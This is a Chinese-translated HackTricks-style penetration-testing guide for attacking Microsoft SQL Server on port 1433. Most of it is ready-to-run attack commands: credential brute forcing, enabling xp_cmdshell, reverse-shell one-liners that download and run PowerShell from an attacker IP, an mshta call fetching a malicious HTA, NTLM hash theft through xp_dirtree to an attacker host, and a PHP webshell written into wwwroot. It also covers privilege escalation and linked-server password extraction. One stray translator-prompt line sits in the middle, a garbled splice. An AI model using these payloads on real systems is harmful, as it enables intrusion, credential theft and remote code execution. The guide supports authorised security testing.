1433 - Pentesting MSSQL - Microsoft SQL Server

Reading time: 28 minutes

tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

基本信息

来自 wikipedia:

Microsoft SQL Server 是由 Microsoft 开发的 关系型数据库 管理系统。作为一个 database server,它的主要功能是根据其他软件应用程序的请求存储和检索数据——这些应用程序可能运行在同一台计算机上,也可能通过网络(包括互联网)运行在另一台计算机上。

默认端口: 1433

1433/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM

托管的数据库即服务 (DBaaS) 着陆

依赖“owning the host”的一切(例如 privilege escalation、lateral movement 和 OS command execution)在 DBaaS 中不复存在。在这些环境中的 Pentesting 必须转向应用层利用、通过 SQL 逻辑进行的数据外泄、misconfigured IAM roles 或糟糕的 network/VPC 设计。例如,Amazon RDS documentation 明确指出 xp_cmdshellTRUSTWORTHY database property 不受支持。

warning

你得到的是一个 database endpoint,而不是一台 server。云提供商管理主机操作系统、数据库引擎二进制文件以及许多安全策略。

Default MS-SQL System Tables

  • master Database: 该数据库至关重要,因为它记录了 SQL Server 实例的所有系统级别细节。
  • msdb Database: SQL Server Agent 使用此数据库来管理警报和任务的调度。
  • model Database: 作为 SQL Server 实例上每个新数据库的模板,任何诸如大小、排序规则、恢复模型等更改都会反映在新创建的数据库中。
  • Resource Database: 一个只读数据库,包含随 SQL Server 一起提供的系统对象。尽管这些对象物理存储在 Resource database 中,但在每个数据库的 sys 模式中以逻辑方式呈现。
  • tempdb Database: 用作临时存储区,用于临时对象或中间结果集。

枚举

自动枚举

如果你对该服务一无所知:

bash
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
msf> use auxiliary/scanner/mssql/mssql_ping

tip

如果你 没有 credentials,你可以尝试猜测它们。你可以使用 nmap 或 metasploit。注意,如果使用现有用户名多次登录失败,你可能会 block accounts

Metasploit (need creds)

bash
#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used

#Steal NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder

#Info gathering
msf> use admin/mssql/mssql_enum #Security checks
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

#Search for insteresting data
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf

#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin

#Code execution
msf> use admin/mssql/mssql_exec #Execute commands
msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload

#Add new admin user from meterpreter session
msf> use windows/manage/mssql_local_auth_bypass

Brute force

手动枚举

Login

MSSQLPwner

shell
# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt

# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt

# Bruteforce using tickets against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt

# Bruteforce using passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt

# Bruteforce using hashes against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
bash
# Using Impacket mssqlclient.py
mssqlclient.py [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
## Recommended -windows-auth when you are going to use a domain. Use as domain the netBIOS name of the machine
mssqlclient.py [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>

# Using sqsh
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
## In case Windows Auth using "." as domain name for local user
sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
## In sqsh you need to use GO after writting the query to send it
1> select 1;
2> go

常见枚举

sql
# Get version
select @@version;
# Get user
select user_name();
# Get databases
SELECT name FROM master.dbo.sysdatabases;
# Use database
USE master

#Get table names
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
EXEC sp_addsrvrolemember 'hacker', 'sysadmin'

#Enumerate links
enum_links
#Use a link
use_link [NAME]

获取用户

Types of MSSQL Users

sql
# Get all the users and roles
select * from sys.database_principals;
## This query filters a bit the results
select name,
create_date,
modify_date,
type_desc as type,
authentication_type_desc as authentication_type,
sid
from sys.database_principals
where type not in ('A', 'R')
order by name;

## Both of these select all the users of the current database (not the server).
## Interesting when you cannot acces the table sys.database_principals
EXEC sp_helpuser
SELECT * FROM sysusers

Get Permissions

  1. Securable: 指由 SQL Server 管理以控制访问的资源。这些资源可分为:
  • Server – 例如数据库、登录名 (logins)、端点 (endpoints)、可用性组 (availability groups) 和 服务器角色 (server roles)。
  • Database – 例如数据库角色、应用程序角色、模式 (schema)、证书、全文目录 (full text catalogs) 和 用户。
  • Schema – 包括表、视图、存储过程、函数、同义词等。
  1. Permission: 与 SQL Server 的 securables 关联,像 ALTER、CONTROL 和 CREATE 这样的权限可以被授予给一个主体 (principal)。权限的管理发生在两个层面:
  • Server Level 使用 logins
  • Database Level 使用 users
  1. Principal: 指被授予对可保护对象权限的实体。主体主要包括登录名 (logins) 和 数据库用户。对可保护对象访问的控制通过授予或拒绝权限,或将登录名和用户包含到具有访问权的角色中来实现。
sql
# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
# Show all possible permissions in MSSQL
SELECT * FROM sys.fn_builtin_permissions(DEFAULT);
# Get all my permissions over securable type SERVER
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
# Get all my permissions over a database
USE <database>
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
# Get members of the role "sysadmin"
Use master
EXEC sp_helpsrvrolemember 'sysadmin';
# Get if the current user is sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
# Get users that can run xp_cmdshell
Use master
EXEC sp_helprotect 'xp_cmdshell'

技巧

执行 OS 命令

caution

注意,要能够执行命令,不仅需要 xp_cmdshell启用(enabled),还需要对 xp_cmdshell 存储过程拥有 EXECUTE 权限。你可以用下面的命令查看谁(除了系统管理员)可以使用 xp_cmdshell

Use master
EXEC sp_helprotect 'xp_cmdshell'
bash
# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'

# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
#This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE

#One liner
EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'

# Bypass blackisted "EXEC xp_cmdshell"
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —

MSSQLPwner

shell
# Executing custom assembly on the current server with windows authentication and executing hostname command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname

# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname

# Executing the hostname command using stored procedures on the linked SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname

# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate

基于 WMI 的远程 SQL 收集 (sqlcmd + CSV export)

操作者可以从 IIS/应用层使用 WMI 执行一个小的批处理脚本,向 MSSQL 进行身份验证并运行即席查询,将结果导出为 CSV。这样可以使收集过程保持简单,并更容易与管理员的正常活动混在一起。

示例 mssq.bat

bat
@echo off
rem Usage: mssq.bat <server> <user> <pass> <"SQL"> <out.csv>
set S=%1
set U=%2
set P=%3
set Q=%4
set O=%5
rem Remove headers, trim trailing spaces, CSV separator = comma
sqlcmd -S %S% -U %U% -P %P% -Q "SET NOCOUNT ON; %Q%" -W -h -1 -s "," -o "%O%"

通过 WMI 远程调用它

cmd
wmic /node:SQLHOST /user:DOMAIN\user /password:Passw0rd! process call create "cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd \"SELECT TOP(100) name FROM sys.tables\" C:\\Windows\\Temp\\out.csv"

PowerShell 替代方案

powershell
$cmd = 'cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd "SELECT name FROM sys.databases" C:\\Windows\\Temp\\dbs.csv'
Invoke-WmiMethod -ComputerName SQLHOST -Class Win32_Process -Name Create -ArgumentList $cmd

注意事项

  • sqlcmd 可能缺失;可退回使用 osql、PowerShell Invoke-Sqlcmd,或使用 System.Data.SqlClient 的单行命令。
  • 注意引号的使用;较长/复杂的查询更容易通过文件提供,或通过 Base64‑encoded 参数,在 batch/PowerShell stub 内解码。
  • Exfil the CSV via SMB (e.g., copy from \SQLHOST\C$\Windows\Temp) or compress and move through your C2。

获取密码哈希

bash
SELECT * FROM master.sys.syslogins;

窃取 NetNTLM hash / Relay attack

你应该启动一个 SMB server 来捕获在认证中使用的 hash(例如 impacket-smbserverresponder)。

bash
xp_dirtree '\\<attacker_IP>\any\thing'
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
EXEC master..xp_subdirs '\\<attacker_IP>\anything\'
EXEC master..xp_fileexist '\\<attacker_IP>\anything\'

# Capture hash
sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2support
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer

MSSQLPwner

shell
# Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250

warning

您可以检查(除 sysadmins 外)谁有权限运行这些 MSSQL 函数,方法如下:

Use master;
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_subdirs';
EXEC sp_helprotect 'xp_fileexist';

使用像 responderInveigh 这样的工具,可以窃取 NetNTLM 哈希
你可以查看如何使用这些工具:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

滥用 MSSQL 受信任的链接

Read this post 以获取有关如何滥用此功能的更多信息:

MSSQL AD Abuse

写入文件

要使用 MSSQL 写入文件,我们 需要启用 Ole Automation Procedures,这需要管理员权限,然后执行一些存储过程来创建文件:

bash
# Enable Ole Automation Procedures
sp_configure 'show advanced options', 1
RECONFIGURE

sp_configure 'Ole Automation Procedures', 1
RECONFIGURE

# Create a File
DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE

使用 OPENROWSET 读取文件

默认情况下,MSSQL 允许对操作系统中该账户具有读取权限的任何文件进行读取。我们可以使用以下 SQL 查询:

sql
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents

但是,BULK 选项需要 ADMINISTER BULK OPERATIONSADMINISTER DATABASE BULK OPERATIONS 权限。

sql
# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTER BULK OPERATIONS' OR permission_name='ADMINISTER DATABASE BULK OPERATIONS';

基于错误的 SQLi 向量:

https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--

RCE/读取文件并执行脚本 (Python and R)

MSSQL 可能允许你执行 Python and/or R 脚本。这些代码将由一个 不同的用户 来执行,而不是通过 xp_cmdshell 执行命令的用户。

Example trying to execute a 'R' "Hellow World!" not working:

Example using configured python to perform several actions:

sql
# Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
#Open and read a file
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
#Multiline
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO

读取注册表

Microsoft SQL Server 提供 多个扩展存储过程,允许你不仅与网络交互,还能访问文件系统,甚至访问 Windows Registry:

常规实例感知
sys.xp_regreadsys.xp_instance_regread
sys.xp_regenumvaluessys.xp_instance_regenumvalues
sys.xp_regenumkeyssys.xp_instance_regenumkeys
sys.xp_regwritesys.xp_instance_regwrite
sys.xp_regdeletevaluesys.xp_instance_regdeletevalue
sys.xp_regdeletekeysys.xp_instance_regdeletekey
sys.xp_regaddmultistringsys.xp_instance_regaddmultistring
sys.xp_regremovemultistringsys.xp_instance_regremovemultistring
sql
# Example read registry
EXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory';
# Example write and then read registry
EXECUTE master.sys.xp_instance_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue', 'REG_SZ', 'Now you see me!';
EXECUTE master.sys.xp_instance_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue';
# Example to check who can use these functions
Use master;
EXEC sp_helprotect 'xp_regread';
EXEC sp_helprotect 'xp_regwrite';

有关 更多示例,请查看 original source

RCE with MSSQL User Defined Function - SQLHttp

可以 在 MSSQL 中使用自定义函数加载 .NET dll。不过,这 需要 dbo 访问权限,因此你需要以数据库 sa 或 管理员角色 的身份连接。

Following this link 查看示例。

RCE with autoadmin_task_agents

根据 to this post,也可以加载远程 dll 并使 MSSQL 执行,例如:

sql
update autoadmin_task_agents set task_assembly_name = "class.dll", task_assembly_path="\\remote-server\\ping.dll",className="Class1.Class1";

请粘贴 src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md 的内容(或要翻译的文本)。我会按你的要求将相关英文翻译成中文,并保持所有 markdown、HTML、链接、路径和标签不变。

csharp
using Microsoft.SqlServer.SmartAdmin;
using System;
using System.Diagnostics;

namespace Class1
{
public class Class1 : TaskAgent
{
public Class1()
{

Process process = new Process();
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.Arguments = "/c ping localhost -t";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
process.WaitForExit();
}

public override void DoWork()
{

}

public override void ExternalJob(string command, LogBaseService jobLogger)
{

}

public override void Start(IServicesFactory services)
{

}

public override void Stop()
{

}


public void Test()
{

}
}
}

用于 RCE 的其他方法

还有其他获得命令执行的方法,比如添加 extended stored procedures, CLR Assemblies, SQL Server Agent Jobs, 和 external scripts.

MSSQL 权限提升

从 db_owner 到 sysadmin

如果一个 普通用户 被赋予对 由管理员拥有的数据库db_owner 角色(例如所有者为 sa),并且该数据库被配置为 trustworthy,该用户可以滥用这些权限进行 privesc,因为在该数据库中创建的 stored procedures 可以以所有者(管理员)的身份 execute

sql
# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases

# Find trustworthy databases
SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;

# Get roles over the selected database (look for your username as db_owner)
USE <trustworthy_db>
SELECT rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)

# If you found you are db_owner of a trustworthy database, you can privesc:
--1. Create a stored procedure to add your user to sysadmin role
USE <trustworthy_db>

CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'USERNAME','sysadmin'

--2. Execute stored procedure to get sysadmin role
USE <trustworthy_db>
EXEC sp_elevate_me

--3. Verify your user is a sysadmin
SELECT is_srvrolemember('sysadmin')

你可以使用一个 metasploit 模块:

bash
msf> use auxiliary/admin/mssql/mssql_escalate_dbowner

或者一个 PS script:

bash
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1
Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1
Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance 10.2.2.184

冒充其他用户

SQL Server 有一种特殊权限,名为 IMPERSONATE,它 允许执行该操作的用户在上下文被重置或 session 结束之前,获取另一个用户或 login 的权限

sql
# Find users you can impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
# Check if the user "sa" or any other high privileged user is mentioned

# Impersonate sa user
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')

# If you can't find any users, make sure to check for links
enum_links
# If there is a link of interest, re-run the above steps on each link
use_link [NAME]

tip

如果你能 impersonate 一个用户,即使他不是 sysadmin,你应该检查 i该用户是否有访问权限 到其他 databases 或 linked servers。

请注意,一旦你成为 sysadmin,你就可以 impersonate 任何其他用户:

sql
-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
-- Verify you are now running as the the MyUser4 login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- Change back to sa
REVERT

你可以使用 metasploit 模块来执行此攻击:

bash
msf> auxiliary/admin/mssql/mssql_escalate_execute_as

或者使用一个 PS 脚本:

bash
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1
Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1
Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword!

Using MSSQL for Persistence

https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/

从 SQL Server Linked Servers 提取密码

An attacker can extract SQL Server Linked Servers passwords from the SQL Instances and get them in clear text, granting the attacker passwords that can be used to acquire a greater foothold on the target. The script to extract and decrypt the passwords stored for the Linked Servers can be found here

Some requirements, and configurations must be done in order for this exploit to work. First of all, you must have Administrator rights on the machine, or the ability to manage the SQL Server Configurations.

After validating your permissions, you need to configure three things, which are the following:

  1. Enable TCP/IP on the SQL Server instances;
  2. Add a Start Up parameter, in this case, a trace flag will be added, which is -T7806.
  3. Enable remote admin connection.

To automate these configurations, this repository has the needed scripts. Besides having a powershell script for each step of the configuration, the repository also has a full script which combines the configuration scripts and the extraction and decryption of the passwords.

For further information, refer to the following links regarding this attack: Decrypting MSSQL Database Link Server Passwords

Troubleshooting the SQL Server Dedicated Administrator Connection

Local Privilege Escalation

The user running MSSQL server will have enabled the privilege token SeImpersonatePrivilege.
You probably will be able to escalate to Administrator following one of these 2 paged:

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

JuicyPotato

Shodan

  • port:1433 !HTTP

参考资料

HackTricks 自动命令

Protocol_Name: MSSQL    #Protocol Abbreviation if there is one.
Port_Number:  1433     #Comma separated if there is more than one.
Protocol_Description: Microsoft SQL Server         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MSSQL
Note: |
Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).

#sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G

###the goal is to get xp_cmdshell working###
1. try and see if it works
xp_cmdshell `whoami`
go

2. try to turn component back on
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell `whoami`
go

3. 'advanced' turn it back on
EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell 'whoami'
go




xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')"


https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html

Entry_2:
Name: Nmap for SQL
Description: Nmap with SQL Scripts
Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP}

Entry_3:
Name: MSSQL consolesless mfs enumeration
Description: MSSQL enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT <PORT>; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT <PORT>; run; exit'

tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks